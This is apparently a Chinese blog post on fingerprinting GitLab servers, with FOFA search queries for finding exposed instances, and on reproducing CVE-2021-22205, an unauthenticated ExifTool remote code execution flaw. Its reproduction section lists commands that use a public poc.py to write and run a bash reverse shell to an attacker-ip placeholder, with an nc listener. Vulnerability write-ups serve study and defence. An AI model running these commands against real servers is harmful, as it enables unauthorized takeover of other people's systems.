GitLab特征及漏洞复现

GitLab是一款Ruby开发的Git项目管理平台。

Web特征

其默认web页面在:http://host:8080/users/sign_in,端口可变,存在用户验证接口。

image-20251122153129989

该产品存在标签页默认icon图标:image-20251122153049781

fofa语法:title="Sign in · GitLab" protocol="https" status_code="200"title="GitLab"

漏洞复现

CVE-2021-22205(ExifTool导致的RCE)

在11.9以后的GitLab中,因为使用了图片处理工具ExifTool而受到漏洞CVE-2021-22204的影响,攻击者可以通过一个未授权的接口上传一张恶意构造的图片,进而在GitLab服务器上执行任意命令。

影响范围:11.9 <= GitLab(CE/EE)< 13.8.8、13.9 <= GitLab(CE/EE)< 13.9.6、13.10 <= GitLab(CE/EE)< 13.10.3

复现示例

GitLab的/uploads/user接口可以上传图片且无需认证,利用已公开的poc.py脚本进行反弹shell:

# 写入反弹shell脚本
python3 poc.py http://target-ip:8080 "echo 'bash -i >& /dev/tcp/attacker-ip/port 0>&1' > /tmp/1.sh"
# 给执行权限
python3 poc.py http://target-ip:8080 "chmod +x /tmp/1.sh"
# 攻击机监听6666端口
nc -lvnp 6666
# 运行,获取git权限shell
python3 poc.py http://target-ip:8080 "/bin/bash /tmp/1.sh"

成功反弹shell:

image-20251122160322403
posted @ 2025-12-02 12:55  shinianyunyan  阅读(52)  评论(0)    收藏  举报